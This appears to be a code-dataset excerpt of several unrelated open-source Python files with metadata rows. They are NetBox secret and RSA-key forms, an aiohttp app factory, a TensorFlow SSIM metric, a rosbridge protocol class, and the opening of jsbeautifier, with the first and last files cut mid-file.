from utilities.forms import (
APISelect, APISelectMultiple, BootstrapMixin, DynamicModelChoiceField, DynamicModelMultipleChoiceField,
FlexibleModelChoiceField, SlugField, StaticSelect2Multiple, TagFilterField,
)
from .constants import *
from .models import Secret, SecretRole, UserKey
def validate_rsa_key(key, is_secret=True):
"""
Validate the format and type of an RSA key.
"""
if key.startswith('ssh-rsa '):
raise forms.ValidationError("OpenSSH line format is not supported. Please ensure that your public is in PEM (base64) format.")
try:
key = RSA.importKey(key)
except ValueError:
raise forms.ValidationError("Invalid RSA key. Please ensure that your key is in PEM (base64) format.")
except Exception as e:
raise forms.ValidationError("Invalid key detected: {}".format(e))
if is_secret and not key.has_private():
raise forms.ValidationError("This looks like a public key. Please provide your private RSA key.")
elif not is_secret and key.has_private():
raise forms.ValidationError("This looks like a private key. Please provide your public RSA key.")
try:
PKCS1_OAEP.new(key)
except Exception:
raise forms.ValidationError("Error validating RSA key. Please ensure that your key supports PKCS#1 OAEP.")
#
# Secret roles
#
class SecretRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = SecretRole
fields = [
'name', 'slug', 'description', 'users', 'groups',
]
widgets = {
'users': StaticSelect2Multiple(),
'groups': StaticSelect2Multiple(),
}
class SecretRoleCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = SecretRole
fields = SecretRole.csv_headers
help_texts = {
'name': 'Name of secret role',
}
#
# Secrets
#
class SecretForm(BootstrapMixin, CustomFieldModelForm):
plaintext = forms.CharField(
max_length=SECRET_PLAINTEXT_MAX_LENGTH,
required=False,
label='Plaintext',
widget=forms.PasswordInput(
attrs={
'class': 'requires-session-key',
}
)
)
plaintext2 = forms.CharField(
max_length=SECRET_PLAINTEXT_MAX_LENGTH,
required=False,
label='Plaintext (verify)',
widget=forms.PasswordInput()
)
role = DynamicModelChoiceField(
queryset=SecretRole.objects.all(),
widget=APISelect(
api_url="/api/secrets/secret-roles/"
)
)
tags = TagField(
required=False
)
class Meta:
model = Secret
fields = [
'role', 'name', 'plaintext', 'plaintext2', 'tags',
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# A plaintext value is required when creating a new Secret
if not self.instance.pk:
self.fields['plaintext'].required = True
def clean(self):
# Verify that the provided plaintext values match
if self.cleaned_data['plaintext'] != self.cleaned_data['plaintext2']:
raise forms.ValidationError({
'plaintext2': "The two given plaintext values do not match. Please check your input."
})
class SecretCSVForm(CustomFieldModelCSVForm):
device = FlexibleModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Device name or ID',
error_messages={
'invalid_choice': 'Device not found.',
}
)
role = forms.ModelChoiceField(
queryset=SecretRole.objects.all(),
to_field_name='name',
help_text='Name of assigned role',
error_messages={
'invalid_choice': 'Invalid secret role.',
}
)
plaintext = forms.CharField(
help_text='Plaintext secret data'
)
class Meta:
model = Secret
fields = Secret.csv_headers
help_texts = {
'name': 'Name or username',
}
def save(self, *args, **kwargs):
s = super().save(*args, **kwargs)
s.plaintext = str(self.cleaned_data['plaintext'])
return s
class SecretBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Secret.objects.all(),
widget=forms.MultipleHiddenInput()
)
role = DynamicModelChoiceField(
queryset=SecretRole.objects.all(),
required=False,
widget=APISelect(
api_url="/api/secrets/secret-roles/"
)
)
name = forms.CharField(
max_length=100,
required=False
)
class Meta:
nullable_fields = [
'name',
]
class SecretFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Secret
q = forms.CharField(
required=False,
label='Search'
)
role = DynamicModelMultipleChoiceField(
queryset=SecretRole.objects.all(),
to_field_name='slug',
required=True,
widget=APISelectMultiple(
api_url="/api/secrets/secret-roles/",
value_field="slug",
)
)
tag = TagFilterField(model)
#
# UserKeys
#
class UserKeyForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = UserKey
fields = ['public_key']
help_texts = {
'public_key': "Enter your public RSA key. Keep the private one with you; you'll need it for decryption. "
"Please note that passphrase-protected keys are not supported.",
}
labels = {
'public_key': ''
}
def clean_public_key(self):
key = self.cleaned_data['public_key']
# Validate the RSA key format.
validate_rsa_key(key, is_secret=False)
return key
class ActivateUserKeyForm(forms.Form):
_selected_action = forms.ModelMultipleChoiceField(
queryset=UserKey.objects.all(),
label='User Keys'
)
secret_key = forms.CharField(
widget=forms.Textarea(
attrs={
'class': 'vLargeTextField',
}
),
label='Your private key'
)
| 27.932203 | 134 | 0.622118 | [
"Apache-2.0"
] | Megzo/netbox | netbox/secrets/forms.py | 6,592 | Python |
import uvloop
import asyncio
import jinja2
import aiohttp_jinja2
from aiohttp import web
from quicksets import settings
from app.middlewares import middlewares
from app.views import routes
async def create_app():
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
app = web.Application(middlewares=middlewares)
aiohttp_jinja2.setup(
app, loader=jinja2.FileSystemLoader(settings.TEMPLATES_PATH))
app.add_routes(routes)
return app
if __name__ == '__main__':
app = create_app()
web.run_app(app, host=settings.HOST, port=settings.PORT)
| 24.083333 | 69 | 0.769896 | [
"MIT"
] | ihor-nahuliak/task-23-jul-2019 | app/application.py | 578 | Python |
import tensorflow as tf
import numpy as np
def _tf_fspecial_gauss(size, sigma, ch=1):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x_data, y_data = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
x_data = np.expand_dims(x_data, axis=-1)
x_data = np.expand_dims(x_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
y_data = np.expand_dims(y_data, axis=-1)
x = tf.constant(x_data, dtype=tf.float32)
y = tf.constant(y_data, dtype=tf.float32)
g = tf.exp(-((x**2 + y**2)/(2.0*sigma**2)))
g = tf.tile(g, [1, 1, ch, 1])
return g / tf.reduce_sum(g)
def tf_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=0.5):
img1 = tf.image.rgb_to_grayscale(img1)
img2 = tf.image.rgb_to_grayscale(img2)
window = _tf_fspecial_gauss(size, sigma,
ch=img1.get_shape().as_list()[-1]) # window shape [size, size]
K1 = 0.01
K2 = 0.03
    L = 1 # dynamic range of the image (255 in case the image has a different scale)
C1 = (K1*L)**2
C2 = (K2*L)**2
mu1 = tf.nn.conv2d(img1, window, strides=[1, 1, 1, 1], padding='VALID')
mu2 = tf.nn.conv2d(img2, window, strides=[1, 1, 1, 1], padding='VALID')
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
sigma1_sq = tf.nn.conv2d(img1*img1, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_sq
sigma2_sq = tf.nn.conv2d(img2*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu2_sq
sigma12 = tf.nn.conv2d(img1*img2, window, strides=[1, 1, 1, 1],
padding='VALID') - mu1_mu2
if cs_map:
value = (
((2*mu1_mu2 + C1) * (2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)
), (2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2)
)
else:
value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2)) / (
(mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if mean_metric:
value = tf.reduce_mean(value)
return value
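# Descriptive note (added, not in the original file): the expression above is the
# standard SSIM index
#     SSIM(x, y) = ((2*mu_x*mu_y + C1) * (2*sigma_xy + C2))
#                  / ((mu_x^2 + mu_y^2 + C1) * (sigma_x^2 + sigma_y^2 + C2))
# and, when cs_map=True, the contrast/structure term
#     (2*sigma_xy + C2) / (sigma_x^2 + sigma_y^2 + C2)
# is returned alongside it for use by tf_ms_ssim below.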
def tf_ms_ssim(img1, img2, mean_metric=True, level=5):
weight = tf.constant([0.0448, 0.2856, 0.3001, 0.2363, 0.1333], dtype=tf.float32)
mssim = []
mcs = []
for l in range(level):
ssim_map, cs_map = tf_ssim(img1, img2, cs_map=True, mean_metric=False)
mssim.append(tf.reduce_mean(ssim_map))
mcs.append(tf.reduce_mean(cs_map))
filtered_im1 = tf.nn.avg_pool(img1, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
filtered_im2 = tf.nn.avg_pool(img2, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
img1 = filtered_im1
img2 = filtered_im2
# list to tensor of dim D+1
    mssim = tf.stack(mssim, axis=0)  # tf.pack was renamed to tf.stack in TF 1.0
    mcs = tf.stack(mcs, axis=0)
value = (tf.reduce_prod(
mcs[0:level-1]**weight[0:level-1]) * (mssim[level-1]**weight[level-1]))
if mean_metric:
value = tf.reduce_mean(value)
return value
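# --- Hedged usage sketch (not part of the original file) ---
# Assumes TensorFlow 1.x graph mode, matching the session-era API used above;
# the inputs are NHWC float32 RGB batches scaled to [0, 1].
if __name__ == "__main__":
    img_a = tf.constant(np.random.rand(1, 64, 64, 3), dtype=tf.float32)
    img_b = tf.constant(np.random.rand(1, 64, 64, 3), dtype=tf.float32)
    ssim_value = tf_ssim(img_a, img_b)
    with tf.Session() as sess:
        print("SSIM between two random images:", sess.run(ssim_value))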
| 35.583333 | 95 | 0.571429 | [
"MIT"
] | 97chenxa/Multiview2Novelview | ssim.py | 2,989 | Python |
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from rosbridge_library.protocol import Protocol
from rosbridge_library.capabilities.call_service import CallService
from rosbridge_library.capabilities.advertise import Advertise
from rosbridge_library.capabilities.publish import Publish
from rosbridge_library.capabilities.subscribe import Subscribe
# imports for defragmentation
from rosbridge_library.capabilities.defragmentation import Defragment
# imports for external service_server
from rosbridge_library.capabilities.advertise_service import AdvertiseService
from rosbridge_library.capabilities.service_response import ServiceResponse
from rosbridge_library.capabilities.unadvertise_service import UnadvertiseService
class RosbridgeProtocol(Protocol):
""" Adds the handlers for the rosbridge opcodes """
rosbridge_capabilities = [CallService, Advertise, Publish, Subscribe, Defragment, AdvertiseService, ServiceResponse, UnadvertiseService]
print("registered capabilities (classes):")
for cap in rosbridge_capabilities:
print(" -", str(cap))
parameters = None
def __init__(self, client_id, parameters = None):
self.parameters = parameters
Protocol.__init__(self, client_id)
for capability_class in self.rosbridge_capabilities:
self.add_capability(capability_class)
| 46.666667 | 140 | 0.793537 | [
"BSD-3-Clause"
] | George-Chia/Cloudroid-Swarm | base-image/rosbridge/rosbridge_library/src/rosbridge_library/rosbridge_protocol.py | 2,940 | Python |
from __future__ import print_function
import sys
import os
import getopt
import re
import string
import errno
import six
from jsbeautifier.__version__ import __version__
#
# The MIT License (MIT)
# Copyright (c) 2007-2013 Einar Lielmanis and contributors.
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Originally written by Einar Lielmanis et al.,
# Conversion to python by Einar Lielmanis, [email protected],
# Parsing improvement for brace-less and semicolon-less statements
# by Liam Newman <[email protected]>
# Python is not my native language, feel free to push things around.
#
# Use either from command line (script displays its usage when run
# without any parameters),
#
#
# or, alternatively, use it as a module:
#
# import jsbeautifier
# res = jsbeautifier.beautify('your javascript string')
# res = jsbeautifier.beautify_file('some_file.js')
#
# you may specify some options:
#
# opts = jsbeautifier.default_options()
# opts.indent_size = 2
# res = jsbeautifier.beautify('some javascript', opts)
#
#
# Here are the available options: (read source)
class BeautifierOptions:
def __init__(self):
self.indent_size = 4
self.indent_char = ' '
self.indent_with_tabs = False
self.preserve_newlines = True
self.max_preserve_newlines = 10
self.space_in_paren = False
self.space_in_empty_paren = False
self.e4x = False
self.jslint_happy = False
self.brace_style = 'collapse'
self.keep_array_indentation = False
self.keep_function_indentation = False
self.eval_code = False
self.unescape_strings = False
self.wrap_line_length = 0
self.break_chained_methods = False
def __repr__(self):
return \
"""indent_size = %d
indent_char = [%s]
preserve_newlines = %s
max_preserve_newlines = %d
space_in_paren = %s
jslint_happy = %s
indent_with_tabs = %s
brace_style = %s
keep_array_indentation = %s
eval_code = %s
wrap_line_length = %s
unescape_strings = %s
""" % ( self.indent_size,
self.indent_char,
self.preserve_newlines,
self.max_preserve_newlines,
self.space_in_paren,
self.jslint_happy,
self.indent_with_tabs,
self.brace_style,
self.keep_array_indentation,
self.eval_code,
self.wrap_line_length,
self.unescape_strings,
)
class BeautifierFlags:
def __init__(self, mode):
self.mode = mode
self.parent = None
self.last_text = ''
self.last_word = ''
self.declaration_statement = False
self.declaration_assignment = False
self.in_html_comment = False
self.multiline_frame = False
self.if_block = False
self.else_block = False
self.do_block = False
self.do_while = False
self.in_case = False
self.in_case_statement = False
self.case_body = False
self.indentation_level = 0
self.line_indent_level = 0
self.start_line_index = 0
self.ternary_depth = 0
self.had_comment = False
def apply_base(self, flags_base, added_newline):
next_indent_level = flags_base.indentation_level;
if not added_newline and \
flags_base.line_indent_level > next_indent_level:
next_indent_level = flags_base.line_indent_level;
self.parent = flags_base;
self.last_text = flags_base.last_text
self.last_word = flags_base.last_word
self.indentation_level = next_indent_level
# Using object instead of string to allow for later expansion of info about each line
class OutputLine:
def __init__(self):
self.text = []
class Acorn:
def __init__(self):
# This section of code was translated to python from acorn (javascript).
#
# Acorn was written by Marijn Haverbeke and released under an MIT
# license. The Unicode regexps (for identifiers and whitespace) were
# taken from [Esprima](http://esprima.org) by Ariya Hidayat.
#
# Git repositories for Acorn are available at
#
# http://marijnhaverbeke.nl/git/acorn
# https://github.com/marijnh/acorn.git
# ## Character categories
# Big ugly regular expressions that match characters in the
# whitespace, identifier, and identifier-start categories. These
# are only applied when a character is found to actually have a
# code point above 128.
self.nonASCIIwhitespace = re.compile(six.u("[\u1680\u180e\u2000-\u200a\u202f\u205f\u3000\ufeff]"))
        self.nonASCIIidentifierStartChars = six.u("\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc")
self.nonASCIIidentifierChars = six.u("\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u0620-\u0649\u0672-\u06d3\u06e7-\u06e8\u06fb-\u06fc\u0730-\u074a\u0800-\u0814\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0840-\u0857\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09d7\u09df-\u09e0\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b5f-\u0b60\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62-\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2-\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d46-\u0d48\u0d57\u0d62-\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e34-\u0e3a\u0e40-\u0e45\u0e50-\u0e59\u0eb4-\u0eb9\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f41-\u0f47\u0f71-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u1000-\u1029\u1040-\u1049\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u170e-\u1710\u1720-\u1730\u1740-\u1750\u1772\u1773\u1780-\u17b2\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u1920-\u192b\u1930-\u193b\u1951-\u196d\u19b0-\u19c0\u19c8-\u19c9\u19d0-\u19d9\u1a00-\u1a15\u1a20-\u1a53\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b46-\u1b4b\u1b50-\u1b59\u1b6b-\u1b73\u1bb0-\u1bb9\u1be6-\u1bf3\u1c00-\u1c22\u1c40-\u1c49\u1c5b-\u1c7d\u1cd0-\u1cd2\u1d00-\u1dbe\u1e01-\u1f15\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2d81-\u2d96\u2de0-\u2dff\u3021-\u3028\u3099\u309a\ua640-\ua66d\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua7f8-\ua800\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8f3-\ua8f7\ua900-\ua909\ua926-\ua92d\ua930-\ua945\ua980-\ua983\ua9b3-\ua9c0\uaa00-\uaa27\uaa40-\uaa41\uaa4c-\uaa4d\uaa50-\uaa59\uaa7b\uaae0-\uaae9\uaaf2-\uaaf3\uabc0-\uabe1\uabec\uabed\uabf0-\uabf9\ufb20-\ufb28\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f")
self.nonASCIIidentifierStart = re.compile("[" + self.nonASCIIidentifierStartChars + "]")
self.nonASCIIidentifier = re.compile("[" + self.nonASCIIidentifierStartChars + self.nonASCIIidentifierChars + "]")
# Whether a single character denotes a newline.
self.newline = re.compile(six.u("[\n\r\u2028\u2029]"))
# Matches a whole line break (where CRLF is considered a single
# line break). Used to count lines.
self.lineBreak = re.compile(six.u("\r\n|[\n\r\u2028\u2029]"))
# Test whether a given character code starts an identifier.
def isIdentifierStart(self, code):
if code < 65:
return code == 36
if code < 91:
return True
if code < 97:
return code == 95
if code < 123:
return True;
return code >= 0xaa and self.nonASCIIidentifierStart.match(six.unichr(code)) != None;
# Test whether a given character is part of an identifier.
def isIdentifierChar(self, code):
if code < 48:
return code == 36;
if code < 58:
return True;
if code < 65:
return False;
if code < 91:
return True;
if code < 97:
return code == 95;
if code < 123:
return True;
return code >= 0xaa and self.nonASCIIidentifier.match(six.unichr(code)) != None;
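    # Hedged illustration (not in the original source): with these predicates,
    # isIdentifierStart(ord('$')) and isIdentifierStart(ord('a')) are True,
    # isIdentifierStart(ord('9')) is False, while isIdentifierChar(ord('9'))
    # is True and isIdentifierChar(ord('-')) is False.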
def default_options():
return BeautifierOptions()
def beautify(string, opts = default_options() ):
b = Beautifier()
return b.beautify(string, opts)
def beautify_file(file_name, opts = default_options() ):
if file_name == '-': # stdin
stream = sys.stdin
else:
stream = open(file_name)
return beautify(''.join(stream.readlines()), opts);
def usage(stream=sys.stdout):
print("jsbeautifier.py@" + __version__ + """
Javascript beautifier (http://jsbeautifier.org/)
Usage: jsbeautifier.py [options] <infile>
<infile> can be "-", which means stdin.
<outfile> defaults to stdout
Input options:
-i, --stdin read input from stdin
Output options:
-s, --indent-size=NUMBER indentation size. (default 4).
-c, --indent-char=CHAR character to indent with. (default space).
-t, --indent-with-tabs Indent with tabs, overrides -s and -c
-d, --disable-preserve-newlines do not preserve existing line breaks.
-P, --space-in-paren add padding spaces within paren, ie. f( a, b )
-E, --space-in-empty-paren Add a single space inside empty paren, ie. f( )
-j, --jslint-happy more jslint-compatible output
-b, --brace-style=collapse brace style (collapse, expand, end-expand)
-k, --keep-array-indentation keep array indentation.
-o, --outfile=FILE specify a file to output to (default stdout)
-f, --keep-function-indentation Do not re-indent function bodies defined in var lines.
-x, --unescape-strings Decode printable chars encoded in \\xNN notation.
-X, --e4x Pass E4X xml literals through untouched
-w, --wrap-line-length Attempt to wrap line when it exceeds this length.
NOTE: Line continues until next wrap point is found.
Rarely needed options:
--eval-code evaluate code if a JS interpreter is
installed. May be useful with some obfuscated
script but poses a potential security issue.
-l, --indent-level=NUMBER initial indentation level. (default 0).
-h, --help, --usage prints this help statement.
-v, --version Show the version
""", file=stream)
if stream == sys.stderr:
return 1
else:
return 0
class MODE:
BlockStatement, Statement, ObjectLiteral, ArrayLiteral, \
ForInitializer, Conditional, Expression = range(7)
class Beautifier:
